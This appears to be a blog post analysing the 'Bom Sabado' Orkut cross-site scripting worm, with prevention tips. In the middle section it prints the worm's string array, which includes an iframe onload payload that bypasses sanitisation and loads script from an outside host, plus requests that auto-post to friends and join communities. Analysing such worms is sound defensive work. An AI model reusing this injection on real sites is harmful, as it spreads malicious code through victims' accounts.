So, today morning I received an email saying I received an Orkut scrap from a friend with contents “Bom Sabado”. Within a minute,  I received the same scrap from another friend. Now getting the feeling that this must be some sort of worm, I decided to open Orkut with firebug logging enabled to see what was going on. It turns out that it’s a typical case of Cross-Site Scripting (XSS), the attacker can inject and execute its script from hxxp://tptools.org/worm.js and the contents of scrap are able to by-pass Orkut sanitization.

What it does

As soon as someone logs in and visits its scrap page,

  1. The same Scrap is automatically posted to all friends
  2. Automatically joins a set of communities it seems visiting one of these communities is sufficient to get infected, with community IDs 106698808, 6, 558494, 106698628, 106691341

Prevention

  1. Use ad-block to disable access to hxxp://tptools.org/worm.js
  2. Do not visit any of the aforementioned communities.

How it works(spreads)

The obfuscated script is available at the aforementioned URL, it is obfuscated and simplified it gives the contents of the script as utilizing the following variable,

Javascript
1
2
var _0x37a1 = [Microsoft.XMLHttp,POST_TOKEN=,CGI.POST_TOKEN,&signature=, Page.signature.raw,POST,Scrapbook?,open, Content-Type,application/x-www-form-urlencoded;, setRequestHeader,&scrapText=,<style/><iframe style=display:none onload="a = document.createElement( 'script');a.src = '/' + '/tptools.o'+'rg/worm.js'+'#<wbr>#'; document . body . appendChild( a )"></iframe>Bom Sabado!,&uid=,
&Action.submit=1,send,GET,RequestFriends?req=fl&uid=,uid,&oxh=1,while (true); &&&START&&&,,replace,responseText,CommunityJoin?cmm=,&Action.join=1, 106698808,6,558494,106698628,106691341,var friends = ,;,list,data,id]
  1. It seems that an ill-formed <style/> tag can escape Google’s sanitation mechanism resulting in the parsing of scrap text as HTML. I might be wrong about this.
  2. The second emphasized section shows the community IDs to which this script automatically sends join requests.

UPDATE: It seems that the website tptools.org has been removed by the hosting company (host gator) The original script and a commented version are attached for interested readers.